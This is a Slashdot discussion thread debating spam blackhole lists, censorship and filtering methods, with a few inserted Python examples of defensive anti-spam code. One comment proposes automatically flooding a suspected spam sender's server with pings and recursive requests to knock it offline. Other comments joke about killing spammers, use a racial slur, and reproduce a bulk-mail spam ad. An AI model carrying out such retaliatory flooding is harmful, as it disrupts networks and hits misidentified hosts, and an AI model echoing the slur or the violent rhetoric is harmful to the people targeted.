Spam Blackhole Lists Redux
tsu doh nimh writes "Are spam blackhole lists good, bad or indifferent? That appears to be the question they're tackling in this Washington Post story. It has some interesting back and forth between supporters of the lists and those who claim they condone censorship."
J adds: Brad Templeton recently offered some comments on the most extreme pro-blacklist position.
By tossing spammers into blackholes...just a thought.
Shouldn't email be open and free for the spammers? They have to make a living somehow, it might as well be on the backs of ISPs and suckers.
I like the idea of white-lists, but big companies that send their customers mass emails like PayPal does will suffer from those even.
Why slashdot? Why not?
And they're not. They go against the spirit of the Internet. What makes it great is that everybody HAS a voice, and when we start talking about who should have a voice and who shouldn't we start to sound a lot like fascists. Doesn't matter that it's speech we don't agree with, because it's just a matter of time before the whole thing is so watered down that nobody in their right mind will bother to use it (like amateur radio nowadays...)
Why don't we just create a system where we all only accept mail that has been PGP encrypted with our public keys? That way spammers will have to burn through a whole lot of clock cycles to get their crap out and as an added benefit, we will get a bit more privacy.
for your average folks, pop ups cause far more frustration, especially brilliant digital and the like....it renders them practically powerless until they call and plead for me to clean up their windoze pc.
spam is something they just spend a little more time deleting...but at least their computers are usable.
I think black hole lists are a great thing, but I will admit, they are certainly censorship, and the customers of an ISP using such a list may disagree with some or all of it.
Perhaps the solution is to design a standard format for a black hole list, and add that functionality to email applications? If the end users had such access for themselves, then they could decide whether they wanted someone else to censor their mail (and whether they wanted to bypass that censorship for certain specific people or networks).
And yes, I know there is software that does this, but it's all proprietary. Is anyone interested in adding a generic functionality to, say, Mozilla? Perhaps the ability to import an XML list of bans from one or more specified URLs, run by volunteer blackhole list sponsors?
Blackholes. Just another thing for spammers to get around, just to sell you penis enlargement products, prime mortgage rates, and how to make $50,000 in 5 days. How about a new email system altogether. Solve all these dang problems.
No.
More stories about spam than the matrix even!
Maybe spam is a problem after all....
Do you even lift?
These aren't the 'roids you're looking for.
What is this the 20th fucking spam story this week? Let me give you a hint. Don't sign up for stupid shit or keep a special account for doing so. I really don't know how you do it, because I don't get spam. I set up an account in case I wanted to sign up for something, and I don't get any spam in that account either. What are you all doing wrong?
If you have been placed on a blacklist, then something must be wrong with your system(s). If the problem is with insecurity and unrestricted relaying, you must fix that before becoming un-blacklisted. If the problem is with a customer, you must deal with them before you can have your IP/domain removed from the blacklist. We need a central service to look at cases and see when someone is "clean." Until they are, their system could still contribute to the spam problem and must be blacklisted.
I'm wondering what the slashdot fans seem to lean towards. Is it viewed as better, or easier, to simply flip on a few RBLs and prevent the messages from ever touching your server...or would you rather use these alongside sorting technology to channel spam towards a designated folder?
Spamassassin and the like do a decent job of helping the spam problem, but my users still complain that their SPAM box has 80 messages a day...even if they get no false positives.
Personally, I'd rather have control over this than my ISP...as at least I can control how I choose to filter or not to filter. And I think the brute-force nature of an RBL often offers peace of mind but without adequate logging or reporting to guarantee you're only blocking what you intend. I'll settle for a full SPAM box any day...
-Barkeep, a draft of your most hazardous brew, for the world is slowly stepping into focus, and I don't like what I see.
What do you call 100 spammers, chained together, and tossed into the ocean to drown?
A start...
Spam is the direct result of an abuse of the existing system(s). It costs companies money, money that they would not be spending otherwise. Spam is not like traditional advertising, like in TV, in which the advertiser actually pays for the ads (since they are using the hoster's resources and/or popularity). On the contrary, the Spammers pay no fees, and force the hosts to take financial losses.
Immediate death is the answer. Kill them. They are like animals. AND WE SHOULD TREAT THEM LIKE ANIMALS!!!!!!!
SPEWS' WHOIS record isn't really hiding anything when you ask the right server: Whether or not that address really exists, I don't know - but I doubt SPEWS is about to put obviously bogus information (e.g. not@available.org) in their WHOIS record. The spammers would just file a complaint with ICANN.
"BSD: Free as in speech. Linux: Free as in beer. Windows 10: Free as in herpes." --Man On Pink Corner in #52607549.
...are just as bad as most analogies.
What is the difference between asking ISPs to cut spammers and asking ISPs to cut users, who set up porn websites?
Well, the latter is not against the TOS of the ISP. The first one is.
The latter is not threatening to destroy Email. The first one is.
The latter is not stealing. The first one is.
But I guess this one's just another personal opinion of an EFF Director, and not representative of EFF's opinion on these issues...
Proletariat of the world, unite to kill spammers. Remember to shoot knees first, so that they can't run away while you slowly torture them to death.
In Soviet Russia, I ruled you
Popups are merely web content, presented on pages that you actually choose to visit - web sites that you willingly expose yourself to. Spam is forced upon you whether you like it or not, and ends up costing both your ISP and you money to prevent.
See, you can say anything you want on the Internet... regardless of blacklists or whitelists. Provided, of course, that you host the data you want to distribute (or at least, pay someone else to host it).
Spam doesn't work the same way as something like a webpage (or Usenet, or IRC, etc). With most systems (HTTP for example), you must actively request the data you want. With email, the spammer makes that decision for you. That's the real problem with email, it's the IETF's equivalent of the Windows Messaging system (which, coincidentally, also gets spammed).
I did some development of push technologies for wireless devices. Preventing unwanted (from the network operator's point of view) push traffic out was a big priority. Email is, essentially, a push service as it's currently implemented, anyway.
Personally, I am leaning towards using a "web of trust" system, with confirmed authentication to prevent relaying of spoofed email. Sure, open relays should be legal, but that doesn't mean anyone has to accept mail from them.
Anyway, the point is, if you say something on your website (such as "niggers are great"), I do not have to read it. However, if you send me a nice big jpeg, with a smiling porch-monkey, that says "niggers are great", I end up having to deal with it. If I felt the need for a larger penis and an unaccredited degree, I'll bet Google could help me find places to get that... I don't need someone telling me shit I don't want to know.
Down with Saudi Arabia!!!
MOVE! It's not that hard.
The SBL and other blackhole lists are a valuable tool in the war on SPAM. The problems with their use arise only when upstream providers of client email services make use of such systems either without the knowledge of the end users or without providing those users optionality in the use of the system. I and many other readers of /. run their own mail servers for receipt of personal email rather than depend on the mail services of their ISPs. These individual mail servers can be configured as you see fit with as lax or stringent mail acceptance rules as desired. When upstream providers of mail services implement such systems there is the possibility that the end users would be unaware of the mail they were not receiving. These systems must be implemented with discretion.
As for the consequences for the sender, of sending to a recipient who may not receive the mail, due to the appearance of the sender's IP address on the SBL or other such lists; the sender is responsible to ensure that they receive service from a reputable ISP who does not cater to spammers. This presumes that due diligence was performed before any IP is added to an SBL list. This also assumes that any mail recipient using such lists is responsible for using a reputable list provider where they are confident of the due diligence performed in generating the list. The whole system (not unlike many other elements of internet architecture) depends on the good faith / good will of the participants.
The primary responsibility lies with the email recipient who selects an SBL type list that is as lax or stringent about the content of the list, as the email recipient is comfortable with, since the relative levels of stringency map directly to how much legitimate mail that recipient will have rejected.
--CTH
--Got Lists? | Top 95 Star Wars Line
Darwin's theory included the idea that:
The organisms whose variations best fit them to the environment are the ones who are most likely to survive, reproduce, and pass those desirable variations on to the next generation.
What's going on!? Spammers aren't best fit! They really SHOULD be drowning in the ocean. I certainly don't want them reproducing!
There will always be some sites improperly secured that allow the spammers to relay their material. I find almost all the emails I get now are bounced through DSL boxes. Blackholing them doesn't help because you're actually blacklisting legitimate users and the spammers themselves are hidden. Having said that, I think such blackholes are important as an incentive to force ISPs to enforce their Terms of Usage. A lot of the SPAM I get is bounced through the same ISPs, or ISPs in eastern countries like Taiwan who don't seem to care about complaints.
Former Iraqi Information Minister Mohammed Saeed al-Sahaf
Of course, there are problems with it. The problem with "false positives" occurs with spam filters that solve the problem only after the bandwidth consumption occurs. And there may be many more false positives in this case. But those are from ISPs that support spam. Legitimate users wouldn't be able to have their messages get through, but who would want to support ISPs that are spammers? ISPs need to prevent their bandwidth from being consumed by junk, but how do they explain it when their customers don't get their intended mail? And here's a true story: Somehow, a perfectly legitimate ISP found itself on one of the blacklists of the ISP where I used to work.
Perhaps blacklists should only be used to block those that are known to be spammers. It's a brute-force kind of method, and it works well, if used properly.
I have to pay to send out on both, and don't pay to receive either. Make the financial use of email the opposite to internet use, and everyone will be happy. Then it's a user pays system, and it would flatten bandwidth use world wide.
If you want to spew penis enlargement emails, don't be surprised if a lot of folks want to cut you off - figuratively if they can't do it literally...
The Internet seems to have very different laws and standards than American laws. If you want to guarantee everyone's rights you must also guarantee responsibilities. Thus, if you want rights for all, purchases on the Internet should be taxed, any threats posted on any Internet site should be taken as though spoken directly, and you must have 1 black webmaster, 1 hispanic webmaster, and 1 old fart webmaster.
Yes it is a form of censorship, but NO this is not about free speech - SPAM is not free in the cost sense. It costs money to move it around - if you don't believe me, then you have no idea how the internet works.
Sure, if you get SPAM at work, you personally don't absorb the cost... and sure, if you have uncapped internet access, sure you don't absorb the cost. BUT SOMEONE DOES. I don't get SPAM at work but do on some personal email addresses and I, like many other people outside the united states, DO NOT have unlimited download limits.
So those who want the right to speak freely about their latest porn sites, sex products, can pay, albeit a tiny amount of money, per email we receive.
Another thing about free speech, it doesn't mean you can talk as loudly as you want in the middle of the street at 3am - no, you WILL be approached by authorities for disturbing the peace - just try it. SPAM is not really all that much different - you don't have the option of not hearing it, the same way as you don't have the option of not hearing someone blaring music or screaming at 3am while trying to sleep. While the remedy might sound easier to delete a SPAM message than bother the local police for noise complaints, you don't have the noise every day, and hundreds of times.
Free speech might mean not being censored, but it doesn't mean you can do it at other people's expense or inconvenience.
One cannot force another to listen to the message, if they so do not desire. So talk all you want, we're covering our ears.
The f*** they do.
Using them is entirely voluntary.
Or is this yet another attempt to define "free speech" as "speech I like"?
Proletariat of the world, unite to kill spammers
In Soviet Russia, I ruled you
All we need is a nice perl script to suck x bytes of bandwidth from a given IP address. It will attempt to do this with pings, recursive http or ftp, or whatever services it can find. (Real maliciousness such as Pings of Death is unnecessary.)
So every time a mail server receives a suspected spam, it would fork() off this script against the server that sent the spam. With enough receiving servers configured to do the same, *poof*! The offending mail server is, almost instantaneously, effectively taken off the Net.
Any sufficiently unpopular but cohesive argument is indistinguishable from trolling.
...once it enters American wires. The message may have originated outside the USA, but once inside here, it IS subject to our laws and whims.
Who pays for the storage, distribution and cleanup of spamming? Who pays for the bandwidth of open proxies used by the spammers? Who pays for the increased subscriber fees ISPs are charging because of costs attributed to spam?
Not the spammers...They're the freeloading thieves of the Internet.
It might make sense for you to think before hitting that reply button.
Proletariat of the world, unite to kill spammers
In Soviet Russia, I ruled you
I set my mail server to tag emails rather than block them (move to spam folder on workstation), so i see some interesting things...
When i first tried it 6 months ago, it magically worked, 99% of spam ended up in my spam folder.
Now the blocking ratio is down to about 10%... and here's why. There are 3 MX records for us:
A - linux server - MX = 10
B - msexchange server - MX = 20
C - isp's server - MX = 30
messages delivered to A are tagged (if spam) and forwarded to B. B exists in the MX records for redundancy. C is used because A and B are on the same site.
What i'm finding though, is that spammers send emails to B or C. When A receives the email, it has come from B or C, not the original spammer, so suddenly the blocking doesn't work anymore.
dammit.
It can only work if everyone in your MX record list does it, and my isp is the biggest in Australia so it's an awfully large machine to move.
I have tried adding in more dummy MX records, so that A is first, middle, and last. That seemed to work for a bit but not for long. I might have more success adding different ip addresses for A and peppering the MX list with those... but it's a bit messy.
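The failure described in the comment above (server A's blocklist test sees backup MX hosts B or C as the sender) is commonly handled by walking the Received headers past the relays you control and testing the first outside address. This is an added example, not part of the original comment; the relay addresses, the sample message and the zone name `dnsbl.example` are constructed, and B and C are assumed to record the connecting IP in square brackets.

```python
import email
import ipaddress
import re
import socket

# Constructed addresses (documentation ranges) standing in for the comment's
# backup MX hosts B and C, which forward everything to primary server A.
TRUSTED_RELAYS = {
    ipaddress.ip_address("192.0.2.20"),     # B
    ipaddress.ip_address("198.51.100.30"),  # C
}
PEER_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Constructed message as A sees it when the spammer delivered to C first.
# The lower Received line is forged by the sender and must not be believed.
SAMPLE = (
    "Received: from mail.spam-source.example (unknown [203.0.113.77])\n"
    "\tby mx-c.isp.example with ESMTP; Mon, 19 May 2003 10:00:01 +1000\n"
    "Received: from localhost (fake [10.1.1.1])\n"
    "\tby forged.example; Mon, 19 May 2003 09:59:00 +1000\n"
    "From: offers@spam-source.example\n"
    "Subject: constructed sample\n"
    "\n"
    "body\n"
)


def dnsbl_name(ip, zone):
    """203.0.113.77 -> 77.113.0.203.<zone>, the name a DNS blocklist is queried with."""
    return ".".join(reversed(str(ip).split("."))) + "." + zone


def dns_listed(ip, zone):
    """Live lookup: a listed address resolves to an answer in 127.0.0.0/8."""
    try:
        answer = socket.gethostbyname(dnsbl_name(ip, zone))
    except OSError:
        return False
    return answer.startswith("127.")


def origin_ip(raw_message, connecting_ip, trusted=TRUSTED_RELAYS):
    """Return the first address outside our own relays that handed the mail over."""
    hop = ipaddress.ip_address(connecting_ip)
    if hop not in trusted:
        return hop  # delivered straight to A, nothing to unwrap
    msg = email.message_from_string(raw_message)
    # Received headers are newest first. As long as the previous hop was one
    # of our relays, the next header was written by that relay and is reliable.
    for header in msg.get_all("Received", []):
        from_part = " ".join(header.split()).split(" by ")[0]
        match = PEER_IP.search(from_part)
        if match is None:
            return None  # relay did not record the peer address
        try:
            hop = ipaddress.ip_address(match.group(1))
        except ValueError:
            return None
        if hop not in trusted:
            return hop  # stop here: everything below is sender-controlled
    return None


def check_message(raw_message, connecting_ip, zone="dnsbl.example", lookup=dns_listed):
    """Classify a message by the blocklist status of its real origin."""
    ip = origin_ip(raw_message, connecting_ip)
    if ip is None:
        return ("unknown", None)
    return ("listed" if lookup(ip, zone) else "clean", str(ip))
```

Passing a stub as `lookup` keeps the check offline for testing; the default performs a real DNS query against whatever zone is configured.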
Still, how effective can a blacklist, however well implemented & maintained, really be? Isn't this one of the easier types of blocks for spammers to get around?
If everyone would just stop trying to grow their penises, turn $5 into $5000, and visit XXChristyXX in her all-nude sorority, spam would wither and die. Lately, I've received some very helpful emails about how to stop spam and make money in the process, secrets I will be sharing with about 16 million fellow computer users very shortly.
--Michael "No live organism can continue for long to exist sanely under conditions of absolute reality;..."
I'm quite surprised nobody has mentioned this yet, or submitted it as a story. He's being indicted for forgery and identity theft.
The lists seem to be similar to the Better Business Bureau (in the US).
.. it is late and I am not sure where my point is going.
"OUR MISSION is to promote and foster the highest ethical relationship between businesses and the public through voluntary self-regulation, consumer and business education, and service excellence." www.bbb.org
The BBB is an organization without authority. It is a voluntary system to People can lodge complaints about a business. People can also inquire about complaints against a business.
I may choose not to do business with any other businesses that do not have what I consider acceptable BBB records. Is it really the BBB's fault? Is their system flawed?
I don't think so. The BBB only provides information. Depending on how much I value the BBB or information, I will choose to do business with a company.
Blacklists are not much different. Organizations sign up for their information *voluntarily* and understand that there may be some "false positives" or disputed cases. Organizations weigh the benefits and risks and make their own decision.
If a blacklist proves to block too much email then organizations might try another blacklist or not use one.
That's it for now.
ok
Keep the Classic Slashdot.
I really don't see what's wrong with this. If I have an ISP and someone is trying to clog up my bandwidth with junk, why can't I block it? What law automatically gives everyone the right to use my network? And if one of my users decides that he wants to get spam (for whatever odd reason) he can switch to another ISP. An ISP is a private corporation and can do whatever the heck it wants. Even if an ISP decided to do something ridiculous like deleting every fifth word in everyone's e-mail there would be nothing wrong with that either. I would quickly switch ISPs, but the ISP isn't doing anything WRONG per se. They can do whatever they want to; I, as a consumer, can choose.
Same thing should be with email. No need to blacklist bad IPs (which might not belong permanently to a spammer) or email addresses (also very temporal). Instead, list all people you trust or all their features that make them trusted by you. You can guess that I mean e-signatures, public keys and cross-trusted CA network.
P.S. if it's more appropriate, please use for the text above:
Less is more !
Thanks to my friend spam I've been able to negotiate a lower mortgage, increase the length of my penis, spy on my neighbours, and start a lucrative ebay business. Thanks spam!
Support the First Amendment. Read at -1
Perhaps the original author meant that ISPs and the like would infringe on (customer) rights by implementing such a blacklist.
RBLs are ineffective at blocking spam and have a fairly large rate of false positives. My provider imposes an RBL on me. I don't see a week without a friend or relative complaining that my "email system is broken".
The funny part is that when you check the domain itself, it's not relaying third party emails anymore. It all depends on the sender's sysadmin to remove his/her IP block from a gazillion RBL providers.
For an interesting comparison of a few methods, look at this paper. Clearly, RBLs are not the way to go.
Here's my response to Brad Templeton's post:
What if, at the end of Brad's list, we add:
h) trading child pornography
i) plotting terrorist attacks
j) promoting cannibalism
On his list, items a, f, and possibly g are potentially illegal - the others are clearly legal in the U.S., although they may violate service agreements with some ISPs. Nonetheless, even the possibly illegal actions are perceived as minor crimes, like speeding - if you found out your neighbor was doing these things, you wouldn't start looking for a new place to live. The three items I listed above are different - if any reasonable person even suspected that their neighbor was planning or committing one of those acts, they'd be calling 911 (or your local government's equivalent, unless you live in a country that supports terrorism / kiddie-porn / cannibalism) in a jiffy.
Spam is different from both of these. It's legal in most places, which distinguishes it from the three items I've mentioned, but it's looked upon with nearly equal horror as a violation of trust. If spam were made illegal (particularly porn spam), it could easily be lumped in with these other categories (okay, spam doesn't directly involve killing/torturing other people, but when you get spam that lists your full name and discusses rape, that's bordering on assault).
I think most people would consider it ethically responsible for their ISPs to report kiddie-porn traders, terrorists, and cannibals - at the very least, it would be irresponsible of the ISPs to not report such activities if they were aware of them. The difference, which Brad's post ignores, is that some activities (kiddie-porn, terrorism, spam) cause or can potentially cause DIRECT physical or emotional harm to other individuals (and before you argue this point with regard to spam, think carefully about how you would distinguish between soliciting children for sex and sending porn emails to children), while other activities (copyright infringement, NAT) don't.
To (hopefully) temper the debate, I'll add that I would oppose a "one strike and you're out" rule. It's easy to imagine someone being tricked into downloading unpleasant images, and it's easy to imagine someone sending out spam without knowing any better. But after being warned, the punishment the second time should be more severe.
On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
No more annoying emails from Mom. Or from anyone else who won't learn how to use PGP.
I'd prefer actual laws against unsolicited commercial email. It's not really speech at all and any judge can tell the difference between a message and an advert. The fact of the matter is that the internet is a pull media and you don't have to shout to be heard. All you have to do is something interesting and people will find out. Spam is not speech, it's an abuse of a public space much like shouting in church or building billboards in the middle of a road.
It's important to distinguish these issues in order to come to the least obtrusive solution. Confusing them plays into the hands of large ISPs such as M$ and AOL who would love to be the only people allowed to annoy everyone with spam, a situation analogous to radio broadcasts. These "service" providers are screaming about how spam is ruining the "internet", yet they do all in their power to leave their users powerless to do anything like run a mail server or a web site for any purpose. They also are using their own blackhole lists as a club against smaller ISPs, without giving their users a choice of spam filter. These are the policies most against the spirit of free speech and it's obvious that these "service" providers who abouts their own users would love to eliminate their competition and so end the internet as we know it.
Friends don't help friends install M$ junk.
i noticed this chunk of the article
"Blacklist operators call this "collateral damage," admitting that it is an unfortunate side effect. But for people like Haselton, who can go unaware for weeks that their messages are dissolving into the ether, collateral damage can seriously hinder someone's ability to communicate via the Internet."
Unaware? Why the fuck didn't he check his smtp logs and notice all the 553's ? When you hit a mail server that rbl's you, it sends you a 553 bounce.
Also, many users' mail servers will notify the sender of the bounce and give them a copy of the bounce message so they know why it got bounced.
Collateral damage is why you NEVER ever host your servers with a spam friendly outfit. Our company recently hosted a client's email server, and the FIRST thing we did was run the colo against every blacklist we could think of. We also asked them their policy on handling abuse emails, and spammer termination. Read news.admin.net-abuse.email, it's full of good info on how to avoid spam friendly hosters.
Lawyers, MBA's, RIAA? A jedi fears not these things!
If this or any of the other methods to curb spam condone censorship, then so do the 'OFF' buttons on my radio and television.
What you meant to say:
We are not afraid of the Spam. Allah has condemned the spammers and they will all die. There is no spam on the internet. The spammers have been defeated in battle after battle. They will commit suicide on the firewalls of our ISPs. God will roast their stomachs in hell.
I've found it easy to use and it automatically configured and read in my contacts from Eudora. I hate Outlook, but I think it's also supported.
Any e-mail I get, I can block with some type of rule. I even wrote a regular expression to detect comments inside words (a new trick of theirs).
Ever wonder why IM has taken off like it has, you don't get fucking spammed.
:-)
Blacklists suck, they don't work. Blacklist an ip address or range and a new guy gets it and can't send mail, real fucking smart and real fucking frustrating to be the admin, use the reverse domain name all you want, but don't involve the ip address.
Do you think ISPs want spammers, spammers are a pain in the ass to deal with, they are the squeaky wheel at an ISP and they rarely pay their bills after bitching about everything.
An extension to smtp and pop3 is needed, smtp stopped working years ago and people now ignore their email, often you need to call someone to check their email and search for you amongst all the spam in their box.
I'm an admin, not a programmer, but I would do it this way if I was a programmer.
mail is received, the host starts out with a zero rating and the user does as well.
A global bayesian filter then ranks this piece of email, the email is then delivered to a user's box with the rating attached for the domain and the user.
The user may sort by this rating to filter out spam from non spam, it is optional at this point, but if the user is using software with the necessary extension, the user can then check if the email is spam or good and have the domain's rating adjusted slightly, and the user's rating fully in the negative or positive, if negative the sending user will not have mail accepted again unless someone uprates the user.
If enough complaints arrive from the sending domain, the domain is blackballed and cannot escape since multiple users have decided that this domain is sending inappropriate email according to the TOS of the receiving ISP.
So, to be more specific, sorry to make this so long, but maybe it will inspire someone.
Connection established with port 25, reverse checked for presence on blackball list, if present drop connection silently. No reverse also gets dropped.
Check for from line with specific user name, if user is on blackball list drop connection silently.
Receive email and grade with bayesian filter using global ruleset, this filter cannot blackball domain or user no matter how much it looks like spam, but can make it nearly so.
Deliver mail, if user confirms mail is spam, blackball user and downgrade domain further, this may actually blackball the domain if enough mail is sent and the filter grades it badly enough (based upon average grade).
Since Dialup and DSL connections do not control their own reverses, it would be trivial to add a simple filter that would refuse mail delivery from these sources, except from their own isp, and then the outgoing mail would be run through a filter, if the rating dropped for the user into negative territory as reported by receiving servers the user would lose their bulk smtp privileges and have their outgoing mail throttled in a severe fashion with all mail containing bcc and cc mail rejected, and the number of emails per hour limited to stave off potential damage.
The SMTP extension comes into play with a network of these mail servers, blackballed domains would be automatically sent to a neighbour in p2p fashion, but ratings would only be accepted if the neighbour server had a valid key, that would be exchanged amongst admins and a network of trust would form.
If a domain becomes blackballed, a user/domain notification takes place alerting that site to the fact mail from their domain/user is not being accepted, at this point an admin could get involved, but my guess is that more often than not the domain will remain there.
Anyhow flame away, my asbestos suit is on
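The four-step acceptance flow proposed in the comment above (drop on missing or blackballed reverse, drop on blackballed sender, grade with a filter that cannot blackball by itself, then let user verdicts blackball) can be modelled as follows. This is an added sketch, not the commenter's code: the thresholds, the point scale, the two-label domain rule and the keyword grader standing in for the global Bayesian filter are all assumptions.

```python
from dataclasses import dataclass

# Every number here is an assumption; the comment gives no thresholds.
# Ratings are integer points from -100 (spam) to +100 (good), starting at 0.
FILTER_FLOOR = -90    # lowest domain rating the filter alone can produce
BLACKBALL_AT = -100   # domain rating at which the domain is blackballed
DOMAIN_STEP = 5       # "adjusted slightly": shift per user verdict
MIN_GRADED = 3        # "enough mail" before a domain can be blackballed


@dataclass
class Domain:
    graded: int = 0
    grade_sum: int = 0
    verdict_shift: int = 0
    blackballed: bool = False

    def rating(self):
        """Average filter grade, floored, plus the shift from user verdicts."""
        if not self.graded:
            return 0
        filter_part = max(FILTER_FLOOR, self.grade_sum / self.graded)
        return filter_part + self.verdict_shift


def toy_grader(body):
    """Constructed stand-in for the global Bayesian filter (keyword count)."""
    hits = sum(word in body.lower() for word in ("mortgage", "enlarge", "$$$"))
    return max(-100, 20 - 60 * hits)


class ReputationGate:
    def __init__(self, grader=toy_grader):
        self.grader = grader
        self.domains = {}   # domain name -> Domain
        self.senders = {}   # address -> -100 (blackballed) or +100 (uprated)

    @staticmethod
    def domain_of(reverse_name):
        # Assumption: the last two labels of the PTR name identify the domain.
        return ".".join(reverse_name.lower().rstrip(".").split(".")[-2:])

    def receive(self, reverse_name, mail_from, body):
        # Step 1: connection on port 25, reverse checked against the list.
        if not reverse_name:
            return ("drop", "no reverse DNS")
        dom = self.domains.setdefault(self.domain_of(reverse_name), Domain())
        if dom.blackballed:
            return ("drop", "domain blackballed")
        # Step 2: the specific sending user.
        if self.senders.get(mail_from.lower(), 0) <= -100:
            return ("drop", "sender blackballed")
        # Step 3: grade; this lowers the average but never blackballs.
        grade = self.grader(body)
        dom.graded += 1
        dom.grade_sum += grade
        return ("deliver", grade)

    def verdict(self, reverse_name, mail_from, is_spam):
        # Step 4: the recipient confirms spam or good mail after delivery.
        dom = self.domains.setdefault(self.domain_of(reverse_name), Domain())
        self.senders[mail_from.lower()] = -100 if is_spam else 100
        dom.verdict_shift += -DOMAIN_STEP if is_spam else DOMAIN_STEP
        if dom.graded >= MIN_GRADED and dom.rating() <= BLACKBALL_AT:
            dom.blackballed = True  # sticky, matching "cannot escape"
        return dom.rating()
```

With these numbers a domain whose mail always grades at -100 sits at -90 until two separate recipients confirm spam, which is the property the comment asks for: the filter gets a domain close to the line, but only people push it over.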
Plus, email marketing WORKS.
24/7 Bulk Mailing Service has 1 opening..
Your message emailed to millions and millions every day non stop 7 days a week.
Average between 1-3 million per day depending on message size etc.
You will receive more leads and business than you ever imagined.
Price is $2500.00 per week.
Other bulk mailers charge from $500-$750 or more per each million emails sent.
With our 24/7 plan, you only pay for the first 5 million, and the remaining 15-30 million are free.
We only have one opening available, so respond now if you are interested.
Click HERE for info.
----
Save the Planet, Save the Trees! Advertise via E-mail.
DELETE WITH ONE SIMPLE KEYSTROKE!
No wasted paper!
It's absolutely your choice. But the first amendment is not just the law, it's a good idea. What people worry about is not the actions of you on your system -- though we might question the wisdom of you refusing mail from innocent people as a means to pressure them -- but the actions of large groups of people, acting in concert, to block the communications of non-spammers.
Even those people have a right to gather and do that, but it can still be a bad idea, worthy of opposition.
Has it been over a year since you last donated to the Electronic Frontier Foundation
If you live in the USA, the Bill of Rights enumerates your right of free speech. That does not make it an absolute right. Try exercising your right to free speech on my property and I will have you arrested for trespassing.
Mea navis aericumbens anguillis abundat
Agreed. And on a practical level, if I didn't use RBL to block overseas spam, I'd be paying $NZ137 ($US80) per month just in the bandwidth charges.
Recycle PCs and build a wireless community network www.hillsborough.org.nz
most ISPs sell this as a SERVICE. which means, their customers are knowingly agreeing to the means.
if i tell my customers that spam will be filtered by blacklisting known spam havens. they can't complain, they are paying for that service, if they do not like my methods, they can move on to a different ISP. i am providing the service that my customers demand
Open relays on DSL lines are no longer valuable if we add a DNS field for SMTP servers authorized to send for a domain. Then, you need to actually own the domain to send mail for it (to servers that require the DNS field). Anonymity gone.
I don't mind server blackhole lists, where connections from certain smtp servers are refused, but blackholing individual email addresses can cause a lot of problems. The most offensive spam usually doesn't include a real from address, and sometimes a from address is randomly selected from their spam victim list. I have on occasion received bounced spam that was sent with my email address. I would not like to be blocked because some blackhole list maintainer decided to add my email without verifying if I'm a spammer.
This may be unrelated, but AOL often blocks my email replies to tech support requests from AOL users. It annoys me. They never even give a reason why I'm blocked.
There are other fairly reliable ways to filter spam, without resorting to lists. Mozilla's bayesian filtering seems to work pretty good, though I haven't yet received enough personal email to thoroughly train it.
Since the american government is in no way involved with this issue, your 1st amendment is not relevant.
You might also want to consider that legislative solutions are rarely effective across borders (although you fucking imperialist asshole americans are working on that).
"To blow recursion, you must first blow recus
It's simple - when a mail comes in you send an e-mail back to the sender with a cookie in the subject line. That e-mail requests they send you a confirmation e-mail to get onto your whitelist, which also causes the original e-mail they sent you to be de-queued and delivered.
If you feed your inbox/archives into your whitelist, 99% of people who e-mail you won't even notice the system is running.
I used to get about 200 spams a day. I tried RBLs, I tried spamassassin. None of it worked reliably - RBLs were only catching about 20% of my spam and spammers now get around spamassassin by looking at the rules when they craft e-mails. False positives were also a problem - sure, it's quicker filtering suspected spam into a spam folder for batch-checking, but it's still a serious hassle with >80 dubious borderline spams a day, and tens slipping straight through the spamassassin/RBL net into your inbox.
Happily for those of you running your own mail servers (or sitting on a *nix box which delivers mail locally via procmail), you can get a program which will do this for you for free. It's called Active Spam Killer, it's written in Python, and you can get it here.
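The challenge-and-confirm flow described in the comment above, as an added sketch that is not part of the original post and is not Active Spam Killer's code. Deriving the cookie as an HMAC of the sender address, the `[confirm:...]` subject format and every name below are assumptions made for illustration.

```python
import hashlib
import hmac
import re

# Assumed subject-line format for the cookie; not taken from any real tool.
COOKIE_RE = re.compile(r"\[confirm:([0-9a-f]{16})\]")


class ChallengeQueue:
    """Hold mail from unknown senders until they answer a challenge."""

    def __init__(self, secret, seed_whitelist=()):
        self._secret = secret
        # Seeding from the existing inbox/archive means known correspondents
        # are never challenged.
        self.whitelist = {addr.lower() for addr in seed_whitelist}
        self.pending = {}   # sender -> messages held back
        self.inbox = []     # delivered messages
        self.outbox = []    # challenges to send: (recipient, subject)

    def _cookie(self, sender):
        # Binding the cookie to the sender address means a cookie issued to
        # one address cannot be used to whitelist a different one.
        mac = hmac.new(self._secret, sender.encode("utf-8"), hashlib.sha256)
        return mac.hexdigest()[:16]

    def receive(self, sender, subject, body):
        sender = sender.lower()
        message = (sender, subject, body)
        if sender in self.whitelist:
            self.inbox.append(message)
            return "delivered"
        if sender in self.pending:
            # Already challenged: queue silently so a forged sender address
            # receives one challenge, not one per spam.
            self.pending[sender].append(message)
            return "queued"
        self.pending[sender] = [message]
        challenge = "Please confirm your message [confirm:%s]" % self._cookie(sender)
        self.outbox.append((sender, challenge))
        return "challenged"

    def confirm(self, sender, subject):
        """Process a confirmation reply; release queued mail if the cookie matches."""
        sender = sender.lower()
        match = COOKIE_RE.search(subject)
        if match is None or sender not in self.pending:
            return False
        if not hmac.compare_digest(match.group(1), self._cookie(sender)):
            return False
        self.whitelist.add(sender)
        self.inbox.extend(self.pending.pop(sender))
        return True


if __name__ == "__main__":
    # Constructed addresses and messages.
    queue = ChallengeQueue(b"constructed-secret", seed_whitelist=["friend@example.org"])
    print(queue.receive("friend@example.org", "lunch?", "..."))
    print(queue.receive("stranger@example.net", "hello", "..."))
    recipient, challenge = queue.outbox[0]
    print(queue.confirm("stranger@example.net", "Re: " + challenge))
    print(len(queue.inbox))
```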
Doesn't seem to run well with the spirit of Free Speech
In my view everybody has the right, absolutely, to free speech. However, I have the right, absolutely, not to be forced to hear it, or even know that somebody is speaking at all, if that is my wish.
Call me old fashioned, but I like a dump to be as memorable as it is devastating - Bender
I'm not American (though I am here now) but that was my point. The U.S. 1st amendment isn't just a law, it's a good idea. It's a principle to be followed in our private lives, too.
Has it been over a year since you last donated to the Electronic Frontier Foundation
I don't like the idea of blacklisting IP netblocks, and here's why: when you see spam coming from any given host, it's rarely the netblock that's the problem, rather it's always the spam content that's the problem!
If you understand that point then you can see why all the collateral damage occurs unnecessarily. You're shooting down the wrong target. We're doing it now because it's easier (blackhole IP, bandwidth saved) but the consequence is too great to ignore: we're fracturing Internet-wide communication more and more every day!
